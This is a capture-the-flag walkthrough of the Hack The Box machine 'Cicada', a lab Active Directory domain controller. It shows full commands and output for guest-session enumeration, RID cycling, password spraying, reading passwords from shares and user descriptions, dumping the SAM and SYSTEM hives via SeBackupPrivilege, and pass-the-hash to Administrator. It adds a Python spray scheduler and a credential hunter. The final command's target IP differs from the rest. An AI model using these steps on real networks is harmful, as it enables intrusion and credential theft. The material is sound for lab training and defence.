Description
Cicada is an easy Hack The Box machine that features the following weaknesses:
- Enumeration of the Domain Controller through a null session
- Recovery of user credentials from a share readable through a null (guest) session
- Enumeration of the Domain Controller with a domain account
- Recovery of user credentials from the description attribute of a domain user
- Recovery of user credentials from a share readable with a domain account
- Initial access to the machine with a domain account that belongs to the Remote Management Users group
- Privilege escalation by dumping the SAM database with a domain account that holds SeBackupPrivilege
Reconnaissance
First we check with ping whether the machine is up and get a first hint of the operating system from the TTL. The target's IP address is 10.129.209.245.
$ ping -c 3 10.129.209.245
PING 10.129.209.245 (10.129.209.245) 56(84) bytes of data.
64 bytes from 10.129.209.245: icmp_seq=1 ttl=127 time=44.9 ms
64 bytes from 10.129.209.245: icmp_seq=2 ttl=127 time=44.5 ms
64 bytes from 10.129.209.245: icmp_seq=3 ttl=127 time=44.0 ms
--- 10.129.209.245 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 44.009/44.471/44.948/0.383 ms
The machine is up, and a TTL of 127 (the Windows default of 128 minus one hop) suggests a Windows host; the TTL is only a heuristic, the service scan below confirms it. Next we run a TCP SYN scan with Nmap. Without -p- Nmap only scans its 1000 most common ports, which is enough to identify the role of the host but can miss less common services.
$ sudo nmap 10.129.209.245 -sS -oN nmap_scan
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.052s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
We get many open ports, all typical of an Active Directory Domain Controller (DNS, Kerberos, RPC, SMB, LDAP and the Global Catalog).
Enumeration
Next we run a more detailed scan of the open ports, with service version detection and the default script set.
$ nmap 10.129.209.245 -Pn -sV -sC -p53,88,135,139,389,445,464,636,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.129.209.245
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
|_ start_date: N/A
|_clock-skew: 7h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.68 seconds
The services confirm an Active Directory environment, specifically the Domain Controller CICADA-DC.cicada.htb. Two host script results are worth noting: SMB signing is enabled and required, so NTLM relay against this host is not an option, and the clock skew to the DC is about seven hours, which would break Kerberos authentication (the KDC tolerates five minutes by default) if we used it later. The rest of this walkthrough authenticates with NTLM, so the skew does not matter here. We add the domain and the DC host name to /etc/hosts on our local system.
$ echo "10.129.209.245 cicada.htb CICADA-DC.cicada.htb cicada-dc" | sudo tee -a /etc/hosts
We can start enumerating by checking whether the DC accepts a null session, using enum4linux-ng.
$ enum4linux-ng -As 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.209.245
[*] Username ......... ''
[*] Random Username .. 'wryjxord'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
...
==========================================
| RPC Session Check on 10.129.209.245 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wryjxord', password ''
[H] Rerunning enumeration with user 'wryjxord' might give more results
The DC accepts both a null session and a session with a random, non-existent username (here wryjxord) and an empty password, which means guest access is enabled: unknown users are mapped to the Guest account. With that we can use crackmapexec (NetExec in newer versions, same syntax) to list the shares this guest session can see.
$ crackmapexec smb 10.129.209.245 -u 'wryjxord' -p '' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\wryjxord:
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL Logon server share
We find the DEV share, for which the guest session has no permissions, and the HR share with read permission. Let's connect to HR and download the files available.
$ smbclient '\\10.129.209.245\HR' -U 'wryjxord%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 260699 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (7,0 KiloBytes/sec) (average 7,0 KiloBytes/sec)
We get the file Notice from HR.txt. It contains the default password handed to new hires, Cicada$M6Corpb*@Lp#nZp!8.
$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Now that we have a password we need usernames to spray it against. The guest session cannot list users directly, but we can enumerate domain accounts through RID cycling (resolving SIDs RID by RID over the guest session) with crackmapexec's --rid-brute option; the grep keeps only user objects. Any random username works, since the session is mapped to Guest either way.
$ crackmapexec smb 10.129.209.245 -u 'xnfjsk' -p '' --rid-brute | grep SidTypeUser
SMB 10.129.209.245 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.209.245 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
We find the domain users john.smoulder, sarah.dantelia, michael.wrightson, david.orelious and emily.oscars and write them, one per line, to a file named users. Before spraying, check the domain lockout policy (crackmapexec smb 10.129.209.245 -u 'xnfjsk' -p '' --pass-pol) so that the number of passwords tried per account stays below the lockout threshold; here we try a single password, so one round is safe. Then we run the password spray:
$ crackmapexec smb 10.129.209.245 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.209.245 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
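As an added example (not part of the original walkthrough), the Python script below turns the --rid-brute output into a spray target list and splits a candidate password list into rounds that stay under the lockout threshold. The sample output is embedded inline (with one constructed group line, since --rid-brute without the grep also returns groups), the candidate passwords other than the HR one are made up for the demo, and the lockout values are assumptions you would replace with the --pass-pol result:

```python
import re
from typing import Dict, List

# Constructed sample: the "--rid-brute" lines from the enumeration above, with
# one group object added (rid-brute without the grep also lists groups).
RID_BRUTE_OUTPUT = """\
SMB  10.129.209.245  445  CICADA-DC  500: CICADA\\Administrator (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  501: CICADA\\Guest (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  502: CICADA\\krbtgt (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  513: CICADA\\Domain Users (SidTypeGroup)
SMB  10.129.209.245  445  CICADA-DC  1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  1104: CICADA\\john.smoulder (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  1106: CICADA\\michael.wrightson (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  1108: CICADA\\david.orelious (SidTypeUser)
SMB  10.129.209.245  445  CICADA-DC  1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Matches "<rid>: <DOMAIN>\<name> (<SidType...>)" at the end of each line.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


def parse_rid_brute(output: str) -> List[Dict]:
    """Return one dict per resolved SID: rid, domain, name and object type."""
    objects = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            objects.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "type": m["type"]})
    return objects


def spray_targets(objects: List[Dict], skip_well_known: bool = True) -> List[str]:
    """Keep user objects only; drop machine accounts (trailing $) and, by
    default, the well-known RIDs below 1000 (Administrator, Guest, krbtgt)."""
    targets = []
    for obj in objects:
        if obj["type"] != "SidTypeUser" or obj["name"].endswith("$"):
            continue
        if skip_well_known and obj["rid"] < 1000:
            continue
        targets.append(obj["name"])
    return targets


def spray_schedule(passwords: List[str], lockout_threshold: int,
                   observation_window_min: int, safety_margin: int = 1) -> List[Dict]:
    """Split candidate passwords into rounds of at most (threshold - margin)
    attempts per account, waiting one observation window between rounds so
    that badPwdCount resets. A threshold of 0 means lockout is disabled."""
    if lockout_threshold <= 0:
        per_round, wait = max(1, len(passwords)), 0
    else:
        per_round, wait = max(1, lockout_threshold - safety_margin), observation_window_min
    rounds = [{"passwords": passwords[i:i + per_round], "wait_minutes_after": wait}
              for i in range(0, len(passwords), per_round)]
    if rounds:
        rounds[-1]["wait_minutes_after"] = 0
    return rounds


if __name__ == "__main__":
    users = spray_targets(parse_rid_brute(RID_BRUTE_OUTPUT))
    print("targets:", ", ".join(users))
    # Assumed policy values and a constructed candidate list; replace the
    # policy values with the --pass-pol result for the real domain.
    candidates = ["Cicada$M6Corpb*@Lp#nZp!8", "Winter2024!", "Cicada123"]
    for n, rnd in enumerate(spray_schedule(candidates, lockout_threshold=3,
                                           observation_window_min=30), 1):
        print(f"round {n}: {rnd['passwords']} then wait {rnd['wait_minutes_after']} min")
```

The target list it produces is exactly the users file used in the spray above; the schedule is what keeps a multi-password spray from locking every account in the domain.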
The default password is still valid for michael.wrightson. With a real domain account we can now enumerate the domain in more depth with enum4linux-ng, including each user's description attribute, a field administrators sometimes misuse for notes.
$ enum4linux-ng -As -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.209.245
ENUM4LINUX - next generation (v1.3.4)
...
=======================================
| Users via RPC on 10.129.209.245 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':
username: john.smoulder
name: (null)
acb: '0x00000210'
description: (null)
'1105':
username: sarah.dantelia
name: (null)
acb: '0x00000210'
description: (null)
'1106':
username: michael.wrightson
name: (null)
acb: '0x00000210'
description: (null)
'1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
'1601':
username: emily.oscars
name: Emily Oscars
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000214'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account
We find the password of david.orelious in his account description, aRt$Lp#7t*VQ!3. With this second account we list the shares again, since share permissions differ per user.
$ crackmapexec smb 10.129.209.245 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.209.245 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.209.245 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.209.245 445 CICADA-DC [+] Enumerated shares
SMB 10.129.209.245 445 CICADA-DC Share Permissions Remark
SMB 10.129.209.245 445 CICADA-DC ----- ----------- ------
SMB 10.129.209.245 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.209.245 445 CICADA-DC C$ Default share
SMB 10.129.209.245 445 CICADA-DC DEV READ
SMB 10.129.209.245 445 CICADA-DC HR READ
SMB 10.129.209.245 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.209.245 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.209.245 445 CICADA-DC SYSVOL READ Logon server share
This user has read access to the DEV share, so we connect to it and download its contents.
$ smbclient '\\10.129.209.245\DEV' -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 332275 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (3,3 KiloBytes/sec) (average 3,3 KiloBytes/sec)
We get the script Backup_script.ps1, which contains hard-coded credentials for the user emily.oscars with the password Q!3@Lp#M6b*7t*Vt.
$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
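Three times in this walkthrough the credentials came from text that was never meant to be a secret store: a notice on a share, a user's description attribute and a hard-coded PowerShell credential. As an added example, not from the original page, here is a small Python hunter that looks for those patterns in collected artifacts and drops the false positives a naive "password is" regex produces (the HR notice also says "your password is a crucial aspect"). The samples are abbreviated copies of the artifacts above, embedded inline; the regexes and the complexity rule are my own assumptions:

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed samples: abbreviated copies of the three artifacts above.
HR_NOTICE = """\
Dear new hire!
As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
Remember, your password is a crucial aspect of keeping your account secure.
"""

USER_DESCRIPTIONS: Dict[str, Optional[str]] = {
    "john.smoulder": None,
    "david.orelious": "Just in case I forget my password is aRt$Lp#7t*VQ!3",
    "Administrator": "Built-in account for administering the computer/domain",
}

BACKUP_SCRIPT = r'''$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''

# Assumed patterns; extend them for your environment (e.g. "-p '...'" in shell scripts).
PATTERNS = [
    ("prose", re.compile(r"password\s*(?:is|:)\s*:?\s*(\S+)", re.I)),
    ("ps-securestring", re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("assignment", re.compile(r"""\$?(?:pass(?:word)?|pwd|secret)\w*\s*=\s*["']([^"']+)["']""", re.I)),
]


@dataclass(frozen=True)
class Finding:
    source: str
    rule: str
    secret: str


def looks_like_secret(candidate: str, min_len: int = 8, min_classes: int = 3) -> bool:
    """Complexity filter that cuts prose hits such as 'a' or 'strong,'.
    Trailing sentence punctuation is stripped first (a password that really
    ends in '.' would be truncated; accepted trade-off)."""
    candidate = candidate.rstrip(".,;:)")
    if len(candidate) < min_len:
        return False
    classes = sum(bool(re.search(p, candidate))
                  for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    return classes >= min_classes


def hunt(source: str, text: Optional[str]) -> List[Finding]:
    """Run every pattern over one artifact; return unique findings in order."""
    findings: List[Finding] = []
    if not text:
        return findings
    for rule, pattern in PATTERNS:
        for m in pattern.finditer(text):
            candidate = m.group(1).rstrip(".,;:)")
            if looks_like_secret(candidate):
                finding = Finding(source, rule, candidate)
                if finding not in findings:
                    findings.append(finding)
    return findings


def hunt_all() -> List[Finding]:
    results = hunt("share:HR/Notice from HR.txt", HR_NOTICE)
    for user, description in USER_DESCRIPTIONS.items():
        results += hunt(f"description:{user}", description)
    results += hunt("share:DEV/Backup_script.ps1", BACKUP_SCRIPT)
    return results


if __name__ == "__main__":
    for f in hunt_all():
        print(f"{f.source:35} {f.rule:16} {f.secret}")
```

The same functions work on the defensive side: feed them an LDAP export of description fields and the contents of readable shares and you find the three credentials on this box before an attacker does.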
Exploitation
emily.oscars is a member of the Remote Management Users group, so we can get a shell on the machine over WinRM (TCP 5985, a port the default scan above did not list) with evil-winrm.
$ evil-winrm -i 10.129.209.245 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
Post-Exploitation
We find that the user emily.oscars holds SeBackupPrivilege (and SeRestorePrivilege).
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
With this privilege we can read any file on the system regardless of its ACL, including the SYSTEM and SAM registry hives, which we export with reg save and then fetch with evil-winrm's download command. Keep in mind that on a Domain Controller the SAM only holds the local accounts (the DSRM Administrator among them); the domain accounts live in NTDS.dit, which the same privilege would let us copy out of a volume shadow copy. In this case the SAM dump turns out to be enough.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system
Info: Downloading C:\Users\emily.oscars.CICADA\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\sam to sam
Info: Download successful!
Back on our system we use impacket-secretsdump to extract the hashes offline. The NT hash of Administrator is 2b87e7c93a3e8a0ea4a581937016f341; the 31d6cfe0... value on the other accounts is the NT hash of an empty password and aad3b435... is the empty LM hash, so nothing else of use is there.
$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
The NT hash alone is enough to authenticate over WinRM with pass-the-hash (evil-winrm -H), no cracking required. The session we get is the domain Administrator, which tells us the Administrator hash stored in the DC's SAM is the same as the domain account's.
$ evil-winrm -i 10.129.209.241 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
Flags
With the Administrator session we can read both flags, user.txt and root.txt.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\emily.oscars.CICADA\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\Administrator\Desktop\root.txt
<REDACTED>